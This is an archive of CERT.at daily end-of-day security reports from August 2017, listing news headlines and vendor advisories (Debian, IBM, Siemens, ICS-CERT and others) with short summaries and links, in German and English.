∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-… ∗∗∗ Security Advisory - Integer Overflow Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-… ∗∗∗ Security Advisory - Lack of Signature Verification Vulnerability in Some Huawei APP ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170816-… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK for Node.js™ in IBM Bluemix ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22006722 ∗∗∗ IBM Security Bulletin: Vulnerability in Rational DOORS Next Generation with potential for Cross-Site Scripting (CVE-2017-1338) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22004138 ∗∗∗ IBM Security Bulletin:Security Vulnerability in IBM Java SDK for Quarterly CPU – April 2017 affect IBM Rational Software Architect and Rational Software Architect for WebSphere Software (CVE-2017-3511) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007149 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities affect Watson Explorer (CVE-2016-8688, CVE-2016-8689, CVE-2017-5601, CVE-2016-10209, CVE-2016-10350, CVE-2016-10349) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006995 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK Java™ Technology Edition Version 6, 7, 8 and IBM® Runtime Environment Java™ Version 6, 7, 8 in IBM FileNet Content Manager, and IBM Content Foundation ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21998551 ∗∗∗ IBM Security Bulletin: Potential security vulnerability in the WebSphere Application Server Admin Console (CVE-2017-1501) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22006810 ∗∗∗ IBM Security Bulletin: IBM Security Access Manager is affected by an OpenSSL vulnerability (CVE-2016-8610) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007023 ∗∗∗ IBM Security Bulletin: IBM Security Access Manager appliances are affected by multiple Network Time Protocol (NTP) vulnerabilities ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007067 ∗∗∗ SSA-275839 (Last Update 2017-08-16): Denial-of-Service Vulnerability in Industrial Products ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-275839… ∗∗∗ SSA-293562 (Last Update 2017-08-16): Vulnerabilities in Industrial Products ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-293562… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.08.2017
by Daily end-of-shift report 14 Aug '17

14 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Freitag 11-08-2017 18:00 − Montag 14-08-2017 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Forscher hacken Computer mit manipulierter DNA ∗∗∗ --------------------------------------------- Auch DNA ist nicht vor Schadsoftware sicher: Forscher der University of Washington konnten einen Computer mithilfe von manipulierter DNA übernehmen. --------------------------------------------- https://futurezone.at/digital-life/forscher-hacken-computer-mit-manipuliert… ∗∗∗ Remotelock LS-6i: Firmware-Update zerstört smarte Türschlösser dauerhaft ∗∗∗ --------------------------------------------- Ein Hersteller smarter Türschlösser hat mindestens 500 Geräte von Kunden durch ein falsches Firmwareupdate dauerhaft zerstört. Betroffen sind vor allem viele Airbnb-Vermieter, ein Austauschprogramm ist gestartet. --------------------------------------------- https://www.golem.de/news/remotelock-ls-6i-firmware-update-zerstoert-smarte… ∗∗∗ Sonic Spy: Forscher finden über 4.000 spionierende Android-Apps ∗∗∗ --------------------------------------------- Ein einziger Anbieter soll seit Jahresanfang rund 4.000 Apps mit bösartigem Inhalt in Umlauf gebracht haben - einige davon auch über Google Play. Die Apps können das Mikrofon aktivieren und Telefonate mitschneiden. --------------------------------------------- https://www.golem.de/news/sonic-spy-forscher-finden-ueber-4000-spionierende… ∗∗∗ Many Factors Conspire in ICS/SCADA Attacks ∗∗∗ --------------------------------------------- A report on the state of SCADA and ICS security points out that critical infrastructure operators are caught between hackers and a lack of vendor and executive support. --------------------------------------------- http://threatpost.com/many-factors-conspire-in-icsscada-attacks/127407/ ∗∗∗ Outlook Web Access based attacks, (Sat, Aug 12th) ∗∗∗ --------------------------------------------- Recently weve started seeing some attacks that utlise OWA. A person in the victim organisation sends an email to one or more of their customers informing them of change in account details. The attacker provides instructions to customers on paying their account utilising the new account details. The email is cced to other internal staff adding a level of legitimacy (also compromised accounts). --------------------------------------------- https://isc.sans.edu/diary/rss/22710 ∗∗∗ A new issue of our SWITCH Security Report is available! ∗∗∗ --------------------------------------------- Dear Reader! A new issue of our bi-monthly SWITCH Security Report is available! The topics covered in this report are: Family business: Petya and its derivatives sweep over half the world as a new wave of ransomware Pay a ransom [...] --------------------------------------------- https://securityblog.switch.ch/2017/08/14/a-new-issue-of-our-switch-securit… ∗∗∗ Sicherheitsupdate: Symantecs Messaging Gateway ist für Schadcode empfänglich ∗∗∗ --------------------------------------------- Mit der aktuellen Version haben die Entwickler zwei Sicherheitslücken in der Schutzlösung geschlossen. --------------------------------------------- https://heise.de/-3799171 ∗∗∗ Datenbank-Server PostgreSQL: Lücke lässt Anmeldung ohne Passwort zu ∗∗∗ --------------------------------------------- Administratoren, die PostgreSQL-Datenbanken betreiben, sollten ihre Software updaten. Unter bestimmten Umständen können sich Angreifer an den Servern ohne Eingabe eines Passwortes anmelden, warnen die Entwickler. --------------------------------------------- https://heise.de/-3799721 ===================== = Advisories = ===================== ∗∗∗ DSA-3937 zabbix - security update ∗∗∗ --------------------------------------------- Lilith Wyatt discovered two vulnerabilities in the Zabbix networkmonitoring system which may result in execution of arbitrary code ordatabase writes by malicious proxies. --------------------------------------------- https://www.debian.org/security/2017/dsa-3937 ∗∗∗ HPESBHF03768 rev.1 - HPE Intelligent Management Center (iMC) PLAT, Remote Code Execution ∗∗∗ --------------------------------------------- Potential security vulnerabilities have been identified in HPE Intelligent Management Center (iMC) Plat. These vulnerabilities could be exploited remotely to allow remote code execution. --------------------------------------------- https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf037… ∗∗∗ VMSA-2017-0014 ∗∗∗ --------------------------------------------- VMware NSX-V Edge updates address OSPF Protocol LSA DoS --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2017-0014.html ∗∗∗ DSA-3936 postgresql-9.6 - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2017/dsa-3936 ∗∗∗ DSA-3935 postgresql-9.4 - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2017/dsa-3935 ∗∗∗ IBM Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM SONAS. ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1010501 ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in the IBM SDK Java Technology Edition affect IBM Domino ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22005160 ∗∗∗ IBM Security Bulletin: A vulnerability in Samba affects IBM Spectrum Scale SMB protocol access method (CVE-2017-9461) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010376 ∗∗∗ IBM Security Bulletin: IBM Security Access Manager Appliance is affected by a Network Security Services (NSS) vulnerability (CVE-2017-5461) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006960 Next End-of-Day Report: 2017-08-16 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.08.2017
by Daily end-of-shift report 11 Aug '17

11 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 10-08-2017 18:00 − Freitag 11-08-2017 18:00 Handler: Alexander Riepl Co-Handler: ===================== = News = ===================== ∗∗∗ Git und Co: Bösartige Code-Repositories können Client angreifen ∗∗∗ --------------------------------------------- Mittels spezieller SSH-URLs kann ein Angreifer Code in den Client-Tools von Quellcode-Verwaltungssystemen ausführen. Der Fehler betrifft praktisch alle verbreiteten Quellcode-Verwaltungssysteme wie Git, Subversion, Mercurial und CVS. --------------------------------------------- https://www.golem.de/news /git-und-co-boesartige-code-repositories-koennen-client-angreifen-17 08-129441.html ∗∗∗ Ukrainian Video-Blogger Arrested For Spreading Petya (NotPetya) Ransomware ∗∗∗ --------------------------------------------- Ukrainian authorities have arrested a 51-year-old man accused of distributing the infamous Petya ransomware (Petya.A, also known as NotPetya) — the same computer virus that massively hit numerous businesses, organisations and banks in Ukraine .. --------------------------------------------- https://thehackernews.com/2017/08/ukraine-petya-ransomware-hacker.html ∗∗∗ Russias Fancy Bear Hackers Used Leaked NSA Tool Eternal Blue" to Target Hotel Guests ∗∗∗ --------------------------------------------- The same hackers who hit the DNC and the Clinton campaign are now apparently spying on high-value travelers via Wi-Fi --------------------------------------------- https://www.wired.com/story/fancy-bear-hotel-hack ∗∗∗ Sichere Passwörter: Viele der herkömmlichen Sicherheitsregeln bringen nichts ∗∗∗ --------------------------------------------- Passwörter brauchen Sonderzeichen, Groß- und Kleinschreibung, Zahlen und müssen oft geändert werden – viele dieser Regeln erhöhen die Sicherheit nicht, sondern bewirken oft das Gegenteil. Der Urheber dieser Regeln bereut sie mittlerweile. --------------------------------------------- https://heise.de/-3797935 ∗∗∗ "Game of Thrones": HBO wollte Hackern 250.000 Dollar Lösegeld zahlen ∗∗∗ --------------------------------------------- Offenbar nur Hinhaltetaktik – Kriminelle: Versprechen wurden gebrochen --------------------------------------------- http://derstandard.at/2000062546236 ∗∗∗ Schüler deckt Google-Lücke auf, streicht 10.000 Dollar ein ∗∗∗ --------------------------------------------- Bug Bounty-Programm verschafft Schüler aus Uruguay unerwarteten Geldsegen --------------------------------------------- http://derstandard.at/2000062559352 ===================== = Advisories = ===================== ∗∗∗ DSA-3929 libsoup2.4 - security update ∗∗∗ --------------------------------------------- Aleksandar Nikolic of Cisco Talos discovered a stack-based bufferoverflow vulnerability in libsoup2.4, a HTTP library implementation inC. A remote attacker can take advantage of this flaw by sending aspecially crafted HTTP request to cause an application using .. --------------------------------------------- https://www.debian.org/security/2017/dsa-3929 ∗∗∗ DSA-3934 git - security update ∗∗∗ --------------------------------------------- Joern Schneeweisz discovered that git, a distributed revision controlsystem, did not correctly handle maliciously constructed ssh://URLs. This allowed an attacker to run .. --------------------------------------------- https://www.debian.org/security/2017/dsa-3934 ∗∗∗ SIMPlight SCADA Software ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-222-01 ∗∗∗ Solar Controls Heating Control Downloader (HCDownloader) ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-222-02 ∗∗∗ Solar Controls WATTConfig M Software ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03 ∗∗∗ Fuji Electric Monitouch V-SFT ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-222-04 ∗∗∗ Symantec Messaging Gateway RCE and CSRF ∗∗∗ --------------------------------------------- http://www.symantec.com/security_response/securityupdates /detail.jsp?fid=security_advisory&pvid=security_advisory&year=2017&s uid=20170810_00 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.08.2017
by Daily end-of-shift report 10 Aug '17

10 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 09-08-2017 18:00 − Donnerstag 10-08-2017 18:00 Handler: Alexander Riepl Co-Handler: ===================== = News = ===================== ∗∗∗ IT-Branche: "Sicherheitspaket" gefährdet Cybersicherheit ∗∗∗ --------------------------------------------- In einem offenen Brief warnen Vertreter der österreichischen IT-Branche vor Gefahren für die Cybersicherheit durch das von der ÖVP geplante „Sicherheitspaket“. --------------------------------------------- https://futurezone.at/netzpolitik/it-branche-sicherheitspaket-gefaehrdet-cy… ∗∗∗ Mystery Company Offers $250,000 Bounty for VM Escape Vulnerabilities ∗∗∗ --------------------------------------------- An unnamed firm is paying up to $250,000 for vulnerabilities related to its virtualization platform. --------------------------------------------- http://threatpost.com/mystery-company-offers-250000-bounty-for-vm-escape-vu… ∗∗∗ SAP Patch Tuesday Update Resolves 19 Flaws, Three High Severity ∗∗∗ --------------------------------------------- SAP released 19 patches on Tuesday, including a trio of vulnerabilities marked high severity in its business management software. --------------------------------------------- http://threatpost.com/sap-patch-tuesday-update-resolves-19-flaws-three-high… ∗∗∗ Salesforce sacks two top security engineers for their DEF CON talk ∗∗∗ --------------------------------------------- Revealing penetration-testing tool sealed staffers fate Salesforce fired two of its senior security engineers after they revealed details of an internal tool for testing IT defenses at DEF CON last month.… --------------------------------------------- www.theregister.co.uk/2017/08/10/salesforce_fires_its_senior_security_engin… ∗∗∗ Bundeskriminalamt (BK) warnt österreichische Unternehmen vor CEO-Betrug ∗∗∗ --------------------------------------------- http://www.bmi.gv.at/cms/bk/_news/start.aspx?id=534C4362372B557557664D3D&pa… ∗∗∗ The Shadow Brokers Have Made Almost $90,000 Selling Hacking Tools by Subscription, Researcher Says ∗∗∗ --------------------------------------------- An anonymous researcher has been able to identify the email address of people who have subscribed to the monthly dump service by the mysterious hacking group. --------------------------------------------- https://motherboard.vice.com/en_us/article/neejqw/the-shadow-brokers-have-m… ∗∗∗ Alleged vDOS Operators Arrested, Charged ∗∗∗ --------------------------------------------- Two young Israeli men alleged by this author to have co-founded vDOS -- until recently the largest and most profitable cyber attack-for-hire service online -- were arrested and formally indicted this week in Israel on conspiracy and hacking charges. --------------------------------------------- https://krebsonsecurity.com/2017/08/alleged-vdos-operators-arrested-charged/ ===================== = Advisories = ===================== ∗∗∗ Session Cache API - Critical - Multiple vulnerabilities - DRUPAL-SA-CONTRIB-2017-065 ∗∗∗ --------------------------------------------- https://www.drupal.org/node/2900951 ∗∗∗ Facebook Like Button - Moderately Critical - XSS - DRUPAL-SA-CONTRIB-2017-066 ∗∗∗ --------------------------------------------- https://www.drupal.org/node/2900966 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.08.2017
by Daily end-of-shift report 09 Aug '17

09 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Dienstag 08-08-2017 18:00 − Mittwoch 09-08-2017 18:00 Handler: Alexander Riepl Co-Handler: Olaf Schwarz ===================== = News = ===================== ∗∗∗ Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read ∗∗∗ --------------------------------------------- For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. --------------------------------------------- http://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-a… ∗∗∗ Engineering Firm Leaks Sensitive Data on Dell, SBC and Oracle ∗∗∗ --------------------------------------------- Power Quality Engineering publicly exposed sensitive electrical infrastructure data on the public internet tied to Dell Technologies, SBC, Freescale, Oracle, Texas Instruments and the City of Austin. --------------------------------------------- http://threatpost.com/engineering-firm-leaks-sensitive-data-on-dell-sbc-and… ∗∗∗ WTF is Mughthesec!? poking on a piece of undetected adware ∗∗∗ --------------------------------------------- Some undetected adware named "Mughthesec" is infecting Macs...lets check it out! --------------------------------------------- https://objective-see.com/blog/blog_0x20.html ∗∗∗ How are people fooled by this? Email to sign a contract provides malware instead. ∗∗∗ --------------------------------------------- https://isc.sans.edu/diary/rss/22696 ∗∗∗ Security Afterworks – Best of Summer of Security Conferences ∗∗∗ --------------------------------------------- September 14, 2017 - 4:30 pm - 6:00 pm SBA Research Favoritenstraße 16 1040 Wien --------------------------------------------- https://www.sba-research.org/events/security-afterworks-best-of-summer-of-s… ∗∗∗ Chip Off the Old EMV ∗∗∗ --------------------------------------------- Recently, Jason Knowles of ABC 7s I-Team asked us, "What is the security risk if your EMV chip falls off your credit card? What could someone do with that?" --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/Chip-Off-the-Old-EMV/ ∗∗∗ Marcus Hutchins free for now as infosec world rallies around suspected banking malware dev ∗∗∗ --------------------------------------------- WannaCry ransomware killer due in court August 14 British security researcher Marcus Hutchins was released on Monday from a Nevada jail after posting bail. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2017/08/08/marcus_hutc… ∗∗∗ FBIs spyware-laden video claims another scalp: Alleged sextortionist charged ∗∗∗ --------------------------------------------- Feds NIT punches through Tor anonymity shield The FBI’s preferred tool for unmasking Tor users has brought about another arrest: a suspected sextortionist who allegedly tricked young girls into sharing nude pics of themselves and then blackmailed his victims. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2017/08/09/fbis_spywar… ∗∗∗ Critical Security Fixes from Adobe, Microsoft ∗∗∗ --------------------------------------------- Adobe has released updates to fix at least 67 vulnerabilities in its Acrobat, Reader and Flash Player software. Separately, Microsoft today issued patches to plug 48 security holes in Windows and other Microsoft products. If you use Windows or Adobe products, its time once again to get your patches on. More than two dozen of the vulnerabilities fixed in todays Windows patch bundle address "critical" .. --------------------------------------------- https://krebsonsecurity.com/2017/08/critical-security-fixes-from-adobe-micr… ∗∗∗ Sonderzeichen, Ziffern und Co: Erfinder bereut Passwort-Regeln ∗∗∗ --------------------------------------------- 2003 entwarf Bill Burr für US-Behörden Passwortregeln, die sich bald global durchsetzten – und heute als unsicher gelten --------------------------------------------- http://derstandard.at/2000062463061 ===================== = Advisories = ===================== ∗∗∗ OSIsoft PI Integrator ∗∗∗ --------------------------------------------- This advisory contains mitigation details for cross-site scripting and improper authorization vulnerabilities in OSIsoft’s PI Integrator for SAP HANA 2016, PI Integrator for Business Analytics 2016 - Data Warehouse, PI Integrator for Business Analytics 2016 - Business Intelligence, PI Integrator for Business Analytics and SAP HANA SQL Utility 2016, and PI Integrator for Microsoft Azure 2016. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-220-01 ∗∗∗ Moxa SoftNVR-IA Live Viewer ∗∗∗ --------------------------------------------- This advisory contains mitigation details for an uncontrolled search path element vulnerability in Moxa’s SoftNVR-IA Live Viewer. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-220-02 ∗∗∗ FortiOS IKE VendorID version information disclosure ∗∗∗ --------------------------------------------- http://fortiguard.com/psirt/FG-IR-17-073 ∗∗∗ FortiWeb SNMPv3 user password viewable in HTML source code ∗∗∗ --------------------------------------------- http://fortiguard.com/psirt/FG-IR-17-162 ∗∗∗ Sicherheitslücken in mehreren Jenkins-Plugins ∗∗∗ --------------------------------------------- https://heise.de/-3796342 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.08.2017
by Daily end-of-shift report 08 Aug '17

08 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Montag 07-08-2017 18:00 − Dienstag 08-08-2017 18:00 Handler: Alexander Riepl Co-Handler: ===================== = News = ===================== ∗∗∗ Hotspot Shield: VPN-Provider soll Nutzer per Javascript ausspionieren ∗∗∗ --------------------------------------------- Der VPN-Provider Hotspot soll seine Nutzer durch Javascript-Elemente und Werbung ausspionieren - obwohl er genau das Gegenteil behauptet. Das wirft eine US-Bürgerrechtsorganisation dem Unternehmen vor und hat Beschwerde bei der FTC eingereicht. --------------------------------------------- https://www.golem.de/news/hotspot-shield-vpn-provider-soll-javascript-in-ve… ∗∗∗ Google Patches 10 Critical Bugs in August Android Security Bulletin ∗∗∗ --------------------------------------------- Googles August Android Security Bulletin featured patches for nearly a dozen remote code execution bugs impacting Googles Pixel and Nexus handsets. --------------------------------------------- http://threatpost.com/google-patches-10-critical-bugs-in-august-android-sec… ∗∗∗ Microsoft to remove WoSign and StartCom certificates in Windows 10 ∗∗∗ --------------------------------------------- Microsoft has concluded that the Chinese Certificate Authorities (CAs) WoSign and StartCom have failed to maintain the standards required by our Trusted Root Program. Observed unacceptable security practices include back-dating SHA-1 certificates, .. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2017/08/08/microsoft-to-remove-wos… ∗∗∗ How Chat App Discord Is Abused by Cybercriminals to Attack ROBLOX Players ∗∗∗ --------------------------------------------- Cybercriminals targeting gamers are nothing new. We’ve reported many similar incidents in the past, from fake game apps to real-money laundering through online game currencies. Usually the aim is simple: to steal personal information and monetize it. And .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/chat-app-discord… ∗∗∗ Practical Analysis of the Cybersecurity of European Smart Grids ∗∗∗ --------------------------------------------- This paper summarizes the experience gained during a series of practical cybersecurity assessments of various components of Europe’s smart electrical grids. --------------------------------------------- http://digitalsubstation.com/en/2017/08/07/practical-analysis-of-nbsp-the-c… ∗∗∗ Google warnt Entwickler von Chrome-Erweiterungen vor Phishing-Mails ∗∗∗ --------------------------------------------- Betrüger sind auf der Jagd nach Log-in-Daten von Entwickler-Accounts, um Chrome-Erweiterungen mit Schadcode zu verseuchen und anschließend zu verteilen, warnt Google. --------------------------------------------- https://heise.de/-3795160 ∗∗∗ Hacker erpressen HBO mit weiteren "Game of Thrones"-Folgen ∗∗∗ --------------------------------------------- Erpresser haben Skript zu Folge 5 von Staffel 7 veröffentlicht und fordern Geld, um weitere Publizierungen zu unterlassen --------------------------------------------- http://derstandard.at/2000062391623 ∗∗∗ IWF warnt: Cyber-Angriffe gefährden weltweite Finanzstabilität ∗∗∗ --------------------------------------------- Attacken von Hackern und Kriminellen immer raffinierter --------------------------------------------- http://derstandard.at/2000062403498 ===================== = Advisories = ===================== ∗∗∗ Security Bulletins Posted ∗∗∗ --------------------------------------------- Adobe has published security bulletins for Adobe Flash Player (APSB17-23), Adobe Acrobat and Reader (APSB17-24), Adobe Experience Manager (APSB17-26) and Adobe Digital Editions (APSB17-27). Adobe recommends users update their product installations to the .. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1480 ∗∗∗ Vulnerability in F2FS File System Leads To Memory Corruption on Android, Linux ∗∗∗ --------------------------------------------- August’s Android Security Bulletin includes three file system vulnerabilities (CVE-2017-10663, CVE-2017-10662, and CVE-2017-0750 that were discovered by Trend Micro researchers. These vulnerabilities could cause memory corruption on the affected devices, .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/vulnerability-f2… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.08.2017
by Daily end-of-shift report 07 Aug '17

07 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Freitag 04-08-2017 18:00 − Montag 07-08-2017 18:00 Handler: Alexander Riepl Co-Handler: ===================== = News = ===================== ∗∗∗ You Can Trick Self-Driving Cars by Defacing Street Signs ∗∗∗ --------------------------------------------- A team of eight researchers has discovered that by altering street signs, an adversary could confuse self-driving cars and cause their machine-learning systems to misclassify signs and take .. --------------------------------------------- https://www.bleepingcomputer.com/news/security/you-can-trick-self-driving-c… ∗∗∗ Passwortmanager: Lastpass ab sofort doppelt so teuer ∗∗∗ --------------------------------------------- Wer den Passwortmanager Lastpass nutzt, muss künftig mehr bezahlen. Nutzern der kostenfreien Version werden einige Funktionen gestrichten. Außerdem kündigt .. --------------------------------------------- https://www.golem.de/news/passwortmanager-lastpass-ab-sofort-doppelt-so-teu… ∗∗∗ Links in phishing-like emails lead to tech support scam ∗∗∗ --------------------------------------------- Tech support scams continue to evolve, with scammers exploring more ways to reach potential victims. Recently, we have observed spam campaigns distributing links that lead to tech support scam websites. Anti-spam filters in Microsoft Exchange .. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2017/08/07/links-in-phishing-like-… ∗∗∗ Increase of phpMyAdmin scans ∗∗∗ --------------------------------------------- PMA (or phpMyAdmin) is a well-known MySQL front-end written in PHP that brings MySQL to the web as stated on the web site[1]. The tool is very popularamongst web developers because it helps to maintain databases just by using a web browser. This also means that the front-end might be publicly exposed! It is a common findingin many penetration tests to find an old PMA interface left byan admin. --------------------------------------------- https://isc.sans.edu/diary/rss/22688 ∗∗∗ ESET Spreading FUD About Torrent Files, Clients ∗∗∗ --------------------------------------------- An anonymous reader writes: ESET has taken fear mongering, something that some security firms continue to do, to a new level by issuing a blanket warning to users to view torrent files and clients as a threat. The warning came from the companys so-called security evangelist Ondrej Kubovic, (who used extremely patchy data to try and .. --------------------------------------------- https://it.slashdot.org/story/17/08/04/1938242/eset-spreading-fud-about-tor… ∗∗∗ Tale of the Two Payloads – TrickBot and Nitol ∗∗∗ --------------------------------------------- A couple of weeks ago, we observed the Necurs botnet distributing a new malware spam campaign with a payload combo that includes Trickbot and Nitol. Trickbot is a banking trojan .. --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%e2… ∗∗∗ Erpressungstrojaner Cerber soll Bitcoins klauen ∗∗∗ --------------------------------------------- Offenbar ist den Malware-Entwicklern von Cerber das Lösegeld nicht genug: Der Verschlüsselungstrojaner soll sich nun auch Bitcoin-Wallets und Passwörter unter den Nagel reißen. --------------------------------------------- https://heise.de/-3793763 ∗∗∗ FireEye dementiert Hacker-Angriff auf US-Sicherheitsfirma Mandiant ∗∗∗ --------------------------------------------- Ein unbekannter Hacker brüstete sich damit, dass er das Netzwerk von Mandiant und Computer von Mitarbeitern kompromittiert hat. FireEye erklärt nun, dass das nicht stimmt. --------------------------------------------- https://heise.de/-3794454 ∗∗∗ Hackercamp SHA2017: All Computers are broken ∗∗∗ --------------------------------------------- ACAB mag in anderen Kreisen etwas anderes bedeuten, doch für Hacker ist die Sache klar: All Computers are broken. Das wurde auf dem niederländischen Hackercamp SHA2017 deutlich. --------------------------------------------- https://heise.de/-3794575 ∗∗∗ Hintergrund: Die Geschichte von Junipers enteigneter Hintertür ∗∗∗ --------------------------------------------- In einem mehrfach ausgezeichneten Paper liefern Forscher eine Art Krypto-Krimi. Sie dokumentieren minutiös, wie der Netzwerkausrüster Juniper eine versteckte Hintertür in seine Produkte einbaute – und wie ein externer Angreifer sie später umfunktionierte. --------------------------------------------- https://heise.de/-3794610 ∗∗∗ Gefälschte GMX-Nachricht: Konto gesperrt ∗∗∗ --------------------------------------------- Kriminelle versenden eine gefälschte GMX-Nachricht mit dem Betreff „GMX Konto Gesperrt“. Darin behaupten sie, dass das E-Mailkonto der Empfänger/innen gelöscht werde. Kund/innen, die das verhindern wollen, sollen ihre Zugangsdaten auf einer gefälschten GMX-Website .. --------------------------------------------- https://www.watchlist-internet.at/phishing/gefaelschte-gmx-nachricht-konto-… ===================== = Advisories = ===================== ∗∗∗ DSA-3926 chromium-browser - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2017/dsa-3926 ∗∗∗ DSA-3925 qemu - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2017/dsa-3925 ∗∗∗ Eaton ELCSoft Vulnerabilities ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-216-01-0 ∗∗∗ WP Live Chat Support <= 7.1.04 - Cross-Site Scripting (XSS) ∗∗∗ --------------------------------------------- https://wpvulndb.com/vulnerabilities/8880 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.08.2017
by Daily end-of-shift report 04 Aug '17

04 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 03-08-2017 18:00 − Freitag 04-08-2017 18:00 Handler: Petr Sikuta Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Week In Review – 4th August 2017 ∗∗∗ --------------------------------------------- Creating Fake Identities Everything today seems to be linked to your identity; or perhaps more specifically, to your digital identity. While safeguarding ones identity is important, it is also equally important to find ways to stop people from creating fake identities. Kevin Mitnick belonged to an earlier generation that many of this generations up and comers may not have heard of. While today he is a respectable information security professional, he wasn’t always quite a white hat, and [...] --------------------------------------------- https://www.alienvault.com/blogs/security-essentials/week-in-review-4th-aug… ∗∗∗ JavaScript Packages Caught Stealing Environment Variables ∗∗∗ --------------------------------------------- On August 1, npm Inc. — the company that runs the biggest JavaScript package repository — removed 38 JavaScript npm packages that were caught stealing environment variables from infected projects. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/security/javascript-packages-caught-s… ∗∗∗ Verseuchte Chrome-Erweiterung infiziert eine Million User ∗∗∗ --------------------------------------------- Die Erweiterung Web Developer wurde gekapert und durch eine Version mit Schadsoftware ausgetauscht und an User verteilt. --------------------------------------------- https://futurezone.at/digital-life/verseuchte-chrome-erweiterung-infiziert-… ∗∗∗ Verhaftung nach Black Hat: Wanna-Cry-Hacker soll Bankingtrojaner entwickelt haben ∗∗∗ --------------------------------------------- Ein britischer Sicherheitsforscher und Hacker ist in den USA verhaftet worden. Der 23-Jährige hatte unabsichtlich dazu beigetragen, die Ausbreitung von Wanna Cry zu verlangsamen. Er soll an der Entwicklung des Kronos-Bankentrojaners beteiligt gewesen sein. --------------------------------------------- https://www.golem.de/news/wanna-cry-sicherheitsforscher-malwaretech-in-den-… ∗∗∗ Weekly Security Roundup ∗∗∗ --------------------------------------------- This week, we’ve published an article about session hijacking, a dangerous hacking method that takes control of a user’s account as they are live and using it. Security articles of the week (July 31st – August 4th, 2017) The biggest story from the beginning of this week was the HBO hack that ended up with leaked [...] --------------------------------------------- https://heimdalsecurity.com/blog/weekly-security-roundup/ ∗∗∗ Cisco schließt Super-Admin-Lücke 